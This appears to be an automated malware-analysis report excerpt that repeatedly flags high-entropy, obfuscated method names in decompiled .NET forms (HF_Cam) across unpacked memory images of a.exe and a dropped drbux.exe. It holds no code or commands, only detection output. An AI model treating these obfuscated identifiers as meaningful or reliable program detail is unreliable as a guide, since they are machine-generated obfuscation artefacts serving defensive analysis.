Source: 17.2.a.exe.620000.0.unpack, DRB1v1T8S8g00PqFQs/BhQ1jSeci7lKnt8QNa.cs	High entropy of concatenated method names: '.cctor', 'A3Vd6mDfIxdn1', 'OLJqO2IArs', 'ErgqxYetMV', 'V1eqkrpc9W', 'sMAqCoBcch', 'AGNqhxio36', 'zaBqLcTSy7', 'yMWqdABfe6', 'cpUqKWc8Kl'
Source: 17.0.a.exe.620000.0.unpack, HF_Cam/Form9.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'jesEZBWgGT', 'h7Xa3VbFQC', 'wjLaz2jIVc', 'RDM8yGlyPQ', 'btL8SyOKOJ', 'NtRVrxWa6o', 'yvMVjv47LW', 'V7O8a0oQsD'
Source: 17.0.a.exe.620000.0.unpack, HF_Cam/Form6.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'jfKbqoTPyI', 'LVganV68OH', 'uqWaA4KE2P', 'RDM8yGlyPQ', 'btL8SyOKOJ', 'o6Ea27U7lq', 'Pk5aLhekw2', 'RI88Wcxkxv'
Source: 17.0.a.exe.620000.0.unpack, HF_Cam/Form20.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'nhRBq5U98b', 'SLqeyN94xg', 'mAveSVtKgW', 'Py4eTJ2g6C', 'WcSeD1GUea', 'dNXeh4Hmx2', 'uGpeEyDyo4', 'obMeM6TNTS'
Source: 17.0.a.exe.620000.0.unpack, HF_Cam/Form4.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'DpPFNo4rb6', 'qu6Nh1hjpW', 'P52NEs4n8U', 't4lQ0V8JIM', 'VZ6QI0bnI2', 'XLivsloMOU', 'ifqvkquyKr', 'PM1e7tWw0S'
Source: 17.0.a.exe.620000.0.unpack, HF_Cam/Form14.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'VW7ShTVMtC', 'y1m6fMliOR', 'KD36CMLlKs', 'kau8qPxc2B', 'Qch8Rj6myf', 'hTR6GMfqIV', 'Nyc6o5Vhve', 'MDg6ulhUTT'
Source: 17.0.a.exe.620000.0.unpack, HF_Cam/frmLineNumbering.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'CsY1sjPl5R', 'bpvTJ2F1Bm', 'ploTbML45e', 'Om5TUXw4FT', 'cfBT42fx85', 'yi8TKx96Ap', 'We6Tx90Old', 'p0ETgQRZE5'
Source: 17.0.a.exe.620000.0.unpack, HF_Cam/Form12.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'jqZRG89nyo', 'xqYYcS6ugv', 'E4OYN1Ke2i', 'TT4Y9I9llj', 'MydYHxf2pO', 'V7O8a0oQsD', 'nST8VcLDsi', 'nHJY8cJbd9'
Source: 17.0.a.exe.620000.0.unpack, HF_Cam/Form11.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'E8UJAlSR48', 's4A8ZrtEcl', 'NxV855X5HV', 'WuS90DV8sg', 'eas9I3CJ33', 'RI88Wcxkxv', 'mNA8me0Lqi', 'V7O8a0oQsD'
Source: 17.0.a.exe.620000.0.unpack, HF_Cam/Form1.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'HeMuoHnPNR', 'QhM9nPOODt', 'esS9A4MHL0', 'htU92PqaOQ', 'wuf9Lka2Ku', 'n6x9fOcaY0', 'e2w9CI68Ml', 'tR79G8PWVn'
Source: 17.0.a.exe.620000.0.unpack, HF_Cam/Form8.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'a2XQ01sX3p', 'EQ6aK52YWA', 'Ch7axEP0Gb', 'Py4eTJ2g6C', 'WcSeD1GUea', 'SLqeyN94xg', 'mAveSVtKgW', 'wUtB6QGq6H'
Source: 17.0.a.exe.620000.0.unpack, HF_Cam/Form16.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'iZYslN1Ui9', 'qu6Nh1hjpW', 'P52NEs4n8U', 'fZuvnc1O5t', 'fC0vACbpen', 'gPmv2VT6hV', 'X0wvLtHqNi', 'aIpvfkOJUt'
Source: 17.0.a.exe.620000.0.unpack, HF_Cam/Form5.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'peb5xBDqZw', 'cKFQhattTg', 'bxcQENh0cv', 'lq9QMwJBAh', 'sh5QllDTbZ', 'SVSQZ40qlq', 'aBiQ54tM7m', 'IANQW6AtAx'
Source: 17.0.a.exe.620000.0.unpack, HF_Cam/Form19.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'OlZZ23UcMW', 'LRo666O7dq', 'YTs6vKiIcX', 'qu6Nh1hjpW', 'P52NEs4n8U', 'bdSvgi2Tcy', 'bnsvwKhuuo', 'XLivsloMOU'
Source: 17.0.a.exe.620000.0.unpack, HF_Cam/Form10.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'M1gJFi1MPv', 't1F8eCv1Aq', 'NGZ8B4LYxu', 'RFc8QKfOnp', 'Ro08Oc63cC', 'V7O8a0oQsD', 'nST8VcLDsi', 'RDM8yGlyPQ'
Source: 17.0.a.exe.620000.0.unpack, HF_Cam/Form7.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'm0EQumEgE8', 'qu6Nh1hjpW', 'P52NEs4n8U', 'WuS90DV8sg', 'eas9I3CJ33', 'GWsaMExoq6', 'wx0al1ua78', 'CKDaZFxMxJ'
Source: 17.0.a.exe.620000.0.unpack, HF_Cam/Form18.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'yGbZa9dVdY', 'V7O8a0oQsD', 'nST8VcLDsi', 'etkvyfa3TD', 'kDRvSmYNJN', 'jBR8hKEAOq', 'fuQ8Exql4N', 'qu6Nh1hjpW'
Source: 17.0.a.exe.620000.0.unpack, HF_Cam/frmHfCam.cs	High entropy of concatenated method names: '.ctor', 'SiKGp1RK7W', 'b18GgJPGTe', 'FMJGNwB1gv', 'YZrGmbULmN', 'RkXGUEhK7B', 'aThGwB7PbS', 'TB6G93JvTm', 'JinGYdZdIQ', 'v7hG32742p'
Source: 17.0.a.exe.620000.0.unpack, HF_Cam/Form17.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'taBsKPFWOM', 'V7O8a0oQsD', 'nST8VcLDsi', 'CsxveFqWc8', 'vWJvBkp1jr', 'X50vQKlvmV', 'SaTvOw0Reg', 'qu6Nh1hjpW'
Source: 17.0.a.exe.620000.0.unpack, HF_Cam/Form13.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'teoS1ZT4jC', 'EDg6rACw6u', 'sMm6jvD2LB', 'xX967iYkI7', 'nu76FVrNja', 'uOw6txwHvR', 'Fua61Q7kIf', 'Pcn6Xjtl20'
Source: 17.0.a.exe.620000.0.unpack, HF_Cam/frmEnvironment.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'QJJiKBO3n', 'dIjNeWQyFQ', 'Xp1NB5EEwe', 'fbqNQA2Znd', 'dqiNOvyEEt', 'OI2NaqTFsA', 'Ow1NVx3tsp', 'oFsNydyMTx'
Source: 17.0.a.exe.620000.0.unpack, HF_Cam/Form15.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'nvXlrxs5Jb', 'xlDvrUDjxT', 'LaHvjBpySC', 'VxDv7MUouc', 'wJVvFrY61F', 'V7O8a0oQsD', 'nST8VcLDsi', 'Mw368UbuhE'
Source: 17.0.a.exe.620000.0.unpack, HF_Cam/Form3.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'ud0BmsGVq0', 'Qf9eJLxlnI', 'BcqebgEg3w', 'mTGeUO1gFS', 'sZue4ok0PI', 'vN8eKrrFeA', 'RdEexZ8DH2', 'qu6Nh1hjpW'
Source: 17.0.a.exe.620000.0.unpack, DRB1v1T8S8g00PqFQs/BhQ1jSeci7lKnt8QNa.cs	High entropy of concatenated method names: '.cctor', 'A3Vd6mDfIxdn1', 'OLJqO2IArs', 'ErgqxYetMV', 'V1eqkrpc9W', 'sMAqCoBcch', 'AGNqhxio36', 'zaBqLcTSy7', 'yMWqdABfe6', 'cpUqKWc8Kl'
Source: drbux.exe.25.dr, HF_Cam/Form4.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'DpPFNo4rb6', 'qu6Nh1hjpW', 'P52NEs4n8U', 't4lQ0V8JIM', 'VZ6QI0bnI2', 'XLivsloMOU', 'ifqvkquyKr', 'PM1e7tWw0S'
Source: drbux.exe.25.dr, HF_Cam/Form6.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'jfKbqoTPyI', 'LVganV68OH', 'uqWaA4KE2P', 'RDM8yGlyPQ', 'btL8SyOKOJ', 'o6Ea27U7lq', 'Pk5aLhekw2', 'RI88Wcxkxv'
Source: drbux.exe.25.dr, HF_Cam/Form8.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'a2XQ01sX3p', 'EQ6aK52YWA', 'Ch7axEP0Gb', 'Py4eTJ2g6C', 'WcSeD1GUea', 'SLqeyN94xg', 'mAveSVtKgW', 'wUtB6QGq6H'
Source: drbux.exe.25.dr, HF_Cam/Form3.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'ud0BmsGVq0', 'Qf9eJLxlnI', 'BcqebgEg3w', 'mTGeUO1gFS', 'sZue4ok0PI', 'vN8eKrrFeA', 'RdEexZ8DH2', 'qu6Nh1hjpW'
Source: drbux.exe.25.dr, HF_Cam/Form1.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'HeMuoHnPNR', 'QhM9nPOODt', 'esS9A4MHL0', 'htU92PqaOQ', 'wuf9Lka2Ku', 'n6x9fOcaY0', 'e2w9CI68Ml', 'tR79G8PWVn'
Source: drbux.exe.25.dr, HF_Cam/Form14.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'VW7ShTVMtC', 'y1m6fMliOR', 'KD36CMLlKs', 'kau8qPxc2B', 'Qch8Rj6myf', 'hTR6GMfqIV', 'Nyc6o5Vhve', 'MDg6ulhUTT'
Source: drbux.exe.25.dr, HF_Cam/Form16.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'iZYslN1Ui9', 'qu6Nh1hjpW', 'P52NEs4n8U', 'fZuvnc1O5t', 'fC0vACbpen', 'gPmv2VT6hV', 'X0wvLtHqNi', 'aIpvfkOJUt'
Source: drbux.exe.25.dr, HF_Cam/Form12.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'jqZRG89nyo', 'xqYYcS6ugv', 'E4OYN1Ke2i', 'TT4Y9I9llj', 'MydYHxf2pO', 'V7O8a0oQsD', 'nST8VcLDsi', 'nHJY8cJbd9'
Source: drbux.exe.25.dr, DRB1v1T8S8g00PqFQs/BhQ1jSeci7lKnt8QNa.cs	High entropy of concatenated method names: '.cctor', 'A3Vd6mDfIxdn1', 'OLJqO2IArs', 'ErgqxYetMV', 'V1eqkrpc9W', 'sMAqCoBcch', 'AGNqhxio36', 'zaBqLcTSy7', 'yMWqdABfe6', 'cpUqKWc8Kl'
Source: drbux.exe.25.dr, HF_Cam/Form19.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'OlZZ23UcMW', 'LRo666O7dq', 'YTs6vKiIcX', 'qu6Nh1hjpW', 'P52NEs4n8U', 'bdSvgi2Tcy', 'bnsvwKhuuo', 'XLivsloMOU'
Source: drbux.exe.25.dr, HF_Cam/frmLineNumbering.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'CsY1sjPl5R', 'bpvTJ2F1Bm', 'ploTbML45e', 'Om5TUXw4FT', 'cfBT42fx85', 'yi8TKx96Ap', 'We6Tx90Old', 'p0ETgQRZE5'
Source: drbux.exe.25.dr, HF_Cam/Form11.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'E8UJAlSR48', 's4A8ZrtEcl', 'NxV855X5HV', 'WuS90DV8sg', 'eas9I3CJ33', 'RI88Wcxkxv', 'mNA8me0Lqi', 'V7O8a0oQsD'
Source: drbux.exe.25.dr, HF_Cam/frmHfCam.cs	High entropy of concatenated method names: '.ctor', 'SiKGp1RK7W', 'b18GgJPGTe', 'FMJGNwB1gv', 'YZrGmbULmN', 'RkXGUEhK7B', 'aThGwB7PbS', 'TB6G93JvTm', 'JinGYdZdIQ', 'v7hG32742p'
Source: drbux.exe.25.dr, HF_Cam/Form13.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'teoS1ZT4jC', 'EDg6rACw6u', 'sMm6jvD2LB', 'xX967iYkI7', 'nu76FVrNja', 'uOw6txwHvR', 'Fua61Q7kIf', 'Pcn6Xjtl20'
Source: drbux.exe.25.dr, HF_Cam/Form10.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'M1gJFi1MPv', 't1F8eCv1Aq', 'NGZ8B4LYxu', 'RFc8QKfOnp', 'Ro08Oc63cC', 'V7O8a0oQsD', 'nST8VcLDsi', 'RDM8yGlyPQ'
Source: drbux.exe.25.dr, HF_Cam/Form18.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'yGbZa9dVdY', 'V7O8a0oQsD', 'nST8VcLDsi', 'etkvyfa3TD', 'kDRvSmYNJN', 'jBR8hKEAOq', 'fuQ8Exql4N', 'qu6Nh1hjpW'
Source: drbux.exe.25.dr, HF_Cam/Form5.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'peb5xBDqZw', 'cKFQhattTg', 'bxcQENh0cv', 'lq9QMwJBAh', 'sh5QllDTbZ', 'SVSQZ40qlq', 'aBiQ54tM7m', 'IANQW6AtAx'
Source: drbux.exe.25.dr, HF_Cam/Form20.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'nhRBq5U98b', 'SLqeyN94xg', 'mAveSVtKgW', 'Py4eTJ2g6C', 'WcSeD1GUea', 'dNXeh4Hmx2', 'uGpeEyDyo4', 'obMeM6TNTS'
Source: drbux.exe.25.dr, HF_Cam/frmEnvironment.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'QJJiKBO3n', 'dIjNeWQyFQ', 'Xp1NB5EEwe', 'fbqNQA2Znd', 'dqiNOvyEEt', 'OI2NaqTFsA', 'Ow1NVx3tsp', 'oFsNydyMTx'
Source: drbux.exe.25.dr, HF_Cam/Form9.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'jesEZBWgGT', 'h7Xa3VbFQC', 'wjLaz2jIVc', 'RDM8yGlyPQ', 'btL8SyOKOJ', 'NtRVrxWa6o', 'yvMVjv47LW', 'V7O8a0oQsD'
Source: drbux.exe.25.dr, HF_Cam/Form7.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'm0EQumEgE8', 'qu6Nh1hjpW', 'P52NEs4n8U', 'WuS90DV8sg', 'eas9I3CJ33', 'GWsaMExoq6', 'wx0al1ua78', 'CKDaZFxMxJ'
Source: drbux.exe.25.dr, HF_Cam/Form17.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'taBsKPFWOM', 'V7O8a0oQsD', 'nST8VcLDsi', 'CsxveFqWc8', 'vWJvBkp1jr', 'X50vQKlvmV', 'SaTvOw0Reg', 'qu6Nh1hjpW'
Source: drbux.exe.25.dr, HF_Cam/Form15.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'nvXlrxs5Jb', 'xlDvrUDjxT', 'LaHvjBpySC', 'VxDv7MUouc', 'wJVvFrY61F', 'V7O8a0oQsD', 'nST8VcLDsi', 'Mw368UbuhE'
Source: 25.0.a.exe.5f0000.0.unpack, HF_Cam/Form1.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'HeMuoHnPNR', 'QhM9nPOODt', 'esS9A4MHL0', 'htU92PqaOQ', 'wuf9Lka2Ku', 'n6x9fOcaY0', 'e2w9CI68Ml', 'tR79G8PWVn'
Source: 25.0.a.exe.5f0000.0.unpack, HF_Cam/Form12.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'jqZRG89nyo', 'xqYYcS6ugv', 'E4OYN1Ke2i', 'TT4Y9I9llj', 'MydYHxf2pO', 'V7O8a0oQsD', 'nST8VcLDsi', 'nHJY8cJbd9'
Source: 25.0.a.exe.5f0000.0.unpack, HF_Cam/Form4.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'DpPFNo4rb6', 'qu6Nh1hjpW', 'P52NEs4n8U', 't4lQ0V8JIM', 'VZ6QI0bnI2', 'XLivsloMOU', 'ifqvkquyKr', 'PM1e7tWw0S'
Source: 25.0.a.exe.5f0000.0.unpack, HF_Cam/Form19.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'OlZZ23UcMW', 'LRo666O7dq', 'YTs6vKiIcX', 'qu6Nh1hjpW', 'P52NEs4n8U', 'bdSvgi2Tcy', 'bnsvwKhuuo', 'XLivsloMOU'
Source: 25.0.a.exe.5f0000.0.unpack, HF_Cam/frmHfCam.cs	High entropy of concatenated method names: '.ctor', 'SiKGp1RK7W', 'b18GgJPGTe', 'FMJGNwB1gv', 'YZrGmbULmN', 'RkXGUEhK7B', 'aThGwB7PbS', 'TB6G93JvTm', 'JinGYdZdIQ', 'v7hG32742p'
Source: 25.0.a.exe.5f0000.0.unpack, HF_Cam/Form18.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'yGbZa9dVdY', 'V7O8a0oQsD', 'nST8VcLDsi', 'etkvyfa3TD', 'kDRvSmYNJN', 'jBR8hKEAOq', 'fuQ8Exql4N', 'qu6Nh1hjpW'
Source: 25.0.a.exe.5f0000.0.unpack, HF_Cam/Form3.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'ud0BmsGVq0', 'Qf9eJLxlnI', 'BcqebgEg3w', 'mTGeUO1gFS', 'sZue4ok0PI', 'vN8eKrrFeA', 'RdEexZ8DH2', 'qu6Nh1hjpW'
Source: 25.0.a.exe.5f0000.0.unpack, HF_Cam/Form9.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'jesEZBWgGT', 'h7Xa3VbFQC', 'wjLaz2jIVc', 'RDM8yGlyPQ', 'btL8SyOKOJ', 'NtRVrxWa6o', 'yvMVjv47LW', 'V7O8a0oQsD'
Source: 25.0.a.exe.5f0000.0.unpack, HF_Cam/Form16.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'iZYslN1Ui9', 'qu6Nh1hjpW', 'P52NEs4n8U', 'fZuvnc1O5t', 'fC0vACbpen', 'gPmv2VT6hV', 'X0wvLtHqNi', 'aIpvfkOJUt'
Source: 25.0.a.exe.5f0000.0.unpack, HF_Cam/frmLineNumbering.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'CsY1sjPl5R', 'bpvTJ2F1Bm', 'ploTbML45e', 'Om5TUXw4FT', 'cfBT42fx85', 'yi8TKx96Ap', 'We6Tx90Old', 'p0ETgQRZE5'
Source: 25.0.a.exe.5f0000.0.unpack, HF_Cam/Form11.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'E8UJAlSR48', 's4A8ZrtEcl', 'NxV855X5HV', 'WuS90DV8sg', 'eas9I3CJ33', 'RI88Wcxkxv', 'mNA8me0Lqi', 'V7O8a0oQsD'
Source: 25.0.a.exe.5f0000.0.unpack, HF_Cam/Form8.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'a2XQ01sX3p', 'EQ6aK52YWA', 'Ch7axEP0Gb', 'Py4eTJ2g6C', 'WcSeD1GUea', 'SLqeyN94xg', 'mAveSVtKgW', 'wUtB6QGq6H'
Source: 25.0.a.exe.5f0000.0.unpack, HF_Cam/Form13.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'teoS1ZT4jC', 'EDg6rACw6u', 'sMm6jvD2LB', 'xX967iYkI7', 'nu76FVrNja', 'uOw6txwHvR', 'Fua61Q7kIf', 'Pcn6Xjtl20'
Source: 25.0.a.exe.5f0000.0.unpack, HF_Cam/Form20.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'nhRBq5U98b', 'SLqeyN94xg', 'mAveSVtKgW', 'Py4eTJ2g6C', 'WcSeD1GUea', 'dNXeh4Hmx2', 'uGpeEyDyo4', 'obMeM6TNTS'
Source: 25.0.a.exe.5f0000.0.unpack, HF_Cam/Form7.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'm0EQumEgE8', 'qu6Nh1hjpW', 'P52NEs4n8U', 'WuS90DV8sg', 'eas9I3CJ33', 'GWsaMExoq6', 'wx0al1ua78', 'CKDaZFxMxJ'
Source: 25.0.a.exe.5f0000.0.unpack, HF_Cam/Form15.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'nvXlrxs5Jb', 'xlDvrUDjxT', 'LaHvjBpySC', 'VxDv7MUouc', 'wJVvFrY61F', 'V7O8a0oQsD', 'nST8VcLDsi', 'Mw368UbuhE'
Source: 25.0.a.exe.5f0000.0.unpack, HF_Cam/Form14.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'VW7ShTVMtC', 'y1m6fMliOR', 'KD36CMLlKs', 'kau8qPxc2B', 'Qch8Rj6myf', 'hTR6GMfqIV', 'Nyc6o5Vhve', 'MDg6ulhUTT'
Source: 25.0.a.exe.5f0000.0.unpack, DRB1v1T8S8g00PqFQs/BhQ1jSeci7lKnt8QNa.cs	High entropy of concatenated method names: '.cctor', 'A3Vd6mDfIxdn1', 'OLJqO2IArs', 'ErgqxYetMV', 'V1eqkrpc9W', 'sMAqCoBcch', 'AGNqhxio36', 'zaBqLcTSy7', 'yMWqdABfe6', 'cpUqKWc8Kl'
Source: 25.0.a.exe.5f0000.0.unpack, HF_Cam/frmEnvironment.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'QJJiKBO3n', 'dIjNeWQyFQ', 'Xp1NB5EEwe', 'fbqNQA2Znd', 'dqiNOvyEEt', 'OI2NaqTFsA', 'Ow1NVx3tsp', 'oFsNydyMTx'
Source: 25.0.a.exe.5f0000.0.unpack, HF_Cam/Form5.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'peb5xBDqZw', 'cKFQhattTg', 'bxcQENh0cv', 'lq9QMwJBAh', 'sh5QllDTbZ', 'SVSQZ40qlq', 'aBiQ54tM7m', 'IANQW6AtAx'
Source: 25.0.a.exe.5f0000.0.unpack, HF_Cam/Form6.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'jfKbqoTPyI', 'LVganV68OH', 'uqWaA4KE2P', 'RDM8yGlyPQ', 'btL8SyOKOJ', 'o6Ea27U7lq', 'Pk5aLhekw2', 'RI88Wcxkxv'
Source: 25.0.a.exe.5f0000.0.unpack, HF_Cam/Form10.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'M1gJFi1MPv', 't1F8eCv1Aq', 'NGZ8B4LYxu', 'RFc8QKfOnp', 'Ro08Oc63cC', 'V7O8a0oQsD', 'nST8VcLDsi', 'RDM8yGlyPQ'
Source: 25.0.a.exe.5f0000.0.unpack, HF_Cam/Form17.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'taBsKPFWOM', 'V7O8a0oQsD', 'nST8VcLDsi', 'CsxveFqWc8', 'vWJvBkp1jr', 'X50vQKlvmV', 'SaTvOw0Reg', 'qu6Nh1hjpW'
Source: 25.2.a.exe.5f0000.1.unpack, HF_Cam/Form1.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'HeMuoHnPNR', 'QhM9nPOODt', 'esS9A4MHL0', 'htU92PqaOQ', 'wuf9Lka2Ku', 'n6x9fOcaY0', 'e2w9CI68Ml', 'tR79G8PWVn'
Source: 25.2.a.exe.5f0000.1.unpack, HF_Cam/Form4.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'DpPFNo4rb6', 'qu6Nh1hjpW', 'P52NEs4n8U', 't4lQ0V8JIM', 'VZ6QI0bnI2', 'XLivsloMOU', 'ifqvkquyKr', 'PM1e7tWw0S'
Source: 25.2.a.exe.5f0000.1.unpack, HF_Cam/Form16.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'iZYslN1Ui9', 'qu6Nh1hjpW', 'P52NEs4n8U', 'fZuvnc1O5t', 'fC0vACbpen', 'gPmv2VT6hV', 'X0wvLtHqNi', 'aIpvfkOJUt'
Source: 25.2.a.exe.5f0000.1.unpack, HF_Cam/Form14.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'VW7ShTVMtC', 'y1m6fMliOR', 'KD36CMLlKs', 'kau8qPxc2B', 'Qch8Rj6myf', 'hTR6GMfqIV', 'Nyc6o5Vhve', 'MDg6ulhUTT'
Source: 25.2.a.exe.5f0000.1.unpack, HF_Cam/frmHfCam.cs	High entropy of concatenated method names: '.ctor', 'SiKGp1RK7W', 'b18GgJPGTe', 'FMJGNwB1gv', 'YZrGmbULmN', 'RkXGUEhK7B', 'aThGwB7PbS', 'TB6G93JvTm', 'JinGYdZdIQ', 'v7hG32742p'
Source: 25.2.a.exe.5f0000.1.unpack, HF_Cam/Form12.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'jqZRG89nyo', 'xqYYcS6ugv', 'E4OYN1Ke2i', 'TT4Y9I9llj', 'MydYHxf2pO', 'V7O8a0oQsD', 'nST8VcLDsi', 'nHJY8cJbd9'
Source: 25.2.a.exe.5f0000.1.unpack, HF_Cam/Form3.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'ud0BmsGVq0', 'Qf9eJLxlnI', 'BcqebgEg3w', 'mTGeUO1gFS', 'sZue4ok0PI', 'vN8eKrrFeA', 'RdEexZ8DH2', 'qu6Nh1hjpW'
Source: 25.2.a.exe.5f0000.1.unpack, HF_Cam/Form11.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'E8UJAlSR48', 's4A8ZrtEcl', 'NxV855X5HV', 'WuS90DV8sg', 'eas9I3CJ33', 'RI88Wcxkxv', 'mNA8me0Lqi', 'V7O8a0oQsD'
Source: 25.2.a.exe.5f0000.1.unpack, HF_Cam/frmLineNumbering.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'CsY1sjPl5R', 'bpvTJ2F1Bm', 'ploTbML45e', 'Om5TUXw4FT', 'cfBT42fx85', 'yi8TKx96Ap', 'We6Tx90Old', 'p0ETgQRZE5'
Source: 25.2.a.exe.5f0000.1.unpack, HF_Cam/Form15.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'nvXlrxs5Jb', 'xlDvrUDjxT', 'LaHvjBpySC', 'VxDv7MUouc', 'wJVvFrY61F', 'V7O8a0oQsD', 'nST8VcLDsi', 'Mw368UbuhE'
Source: 25.2.a.exe.5f0000.1.unpack, HF_Cam/Form9.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'jesEZBWgGT', 'h7Xa3VbFQC', 'wjLaz2jIVc', 'RDM8yGlyPQ', 'btL8SyOKOJ', 'NtRVrxWa6o', 'yvMVjv47LW', 'V7O8a0oQsD'
Source: 25.2.a.exe.5f0000.1.unpack, HF_Cam/Form18.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'yGbZa9dVdY', 'V7O8a0oQsD', 'nST8VcLDsi', 'etkvyfa3TD', 'kDRvSmYNJN', 'jBR8hKEAOq', 'fuQ8Exql4N', 'qu6Nh1hjpW'
Source: 25.2.a.exe.5f0000.1.unpack, HF_Cam/Form20.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'nhRBq5U98b', 'SLqeyN94xg', 'mAveSVtKgW', 'Py4eTJ2g6C', 'WcSeD1GUea', 'dNXeh4Hmx2', 'uGpeEyDyo4', 'obMeM6TNTS'
Source: 25.2.a.exe.5f0000.1.unpack, DRB1v1T8S8g00PqFQs/BhQ1jSeci7lKnt8QNa.cs	High entropy of concatenated method names: '.cctor', 'A3Vd6mDfIxdn1', 'OLJqO2IArs', 'ErgqxYetMV', 'V1eqkrpc9W', 'sMAqCoBcch', 'AGNqhxio36', 'zaBqLcTSy7', 'yMWqdABfe6', 'cpUqKWc8Kl'
Source: 25.2.a.exe.5f0000.1.unpack, HF_Cam/Form8.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'a2XQ01sX3p', 'EQ6aK52YWA', 'Ch7axEP0Gb', 'Py4eTJ2g6C', 'WcSeD1GUea', 'SLqeyN94xg', 'mAveSVtKgW', 'wUtB6QGq6H'
Source: 25.2.a.exe.5f0000.1.unpack, HF_Cam/Form19.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'OlZZ23UcMW', 'LRo666O7dq', 'YTs6vKiIcX', 'qu6Nh1hjpW', 'P52NEs4n8U', 'bdSvgi2Tcy', 'bnsvwKhuuo', 'XLivsloMOU'
Source: 25.2.a.exe.5f0000.1.unpack, HF_Cam/frmEnvironment.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'QJJiKBO3n', 'dIjNeWQyFQ', 'Xp1NB5EEwe', 'fbqNQA2Znd', 'dqiNOvyEEt', 'OI2NaqTFsA', 'Ow1NVx3tsp', 'oFsNydyMTx'
Source: 25.2.a.exe.5f0000.1.unpack, HF_Cam/Form6.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'jfKbqoTPyI', 'LVganV68OH', 'uqWaA4KE2P', 'RDM8yGlyPQ', 'btL8SyOKOJ', 'o6Ea27U7lq', 'Pk5aLhekw2', 'RI88Wcxkxv'
Source: 25.2.a.exe.5f0000.1.unpack, HF_Cam/Form5.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'peb5xBDqZw', 'cKFQhattTg', 'bxcQENh0cv', 'lq9QMwJBAh', 'sh5QllDTbZ', 'SVSQZ40qlq', 'aBiQ54tM7m', 'IANQW6AtAx'
Source: 25.2.a.exe.5f0000.1.unpack, HF_Cam/Form17.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'taBsKPFWOM', 'V7O8a0oQsD', 'nST8VcLDsi', 'CsxveFqWc8', 'vWJvBkp1jr', 'X50vQKlvmV', 'SaTvOw0Reg', 'qu6Nh1hjpW'
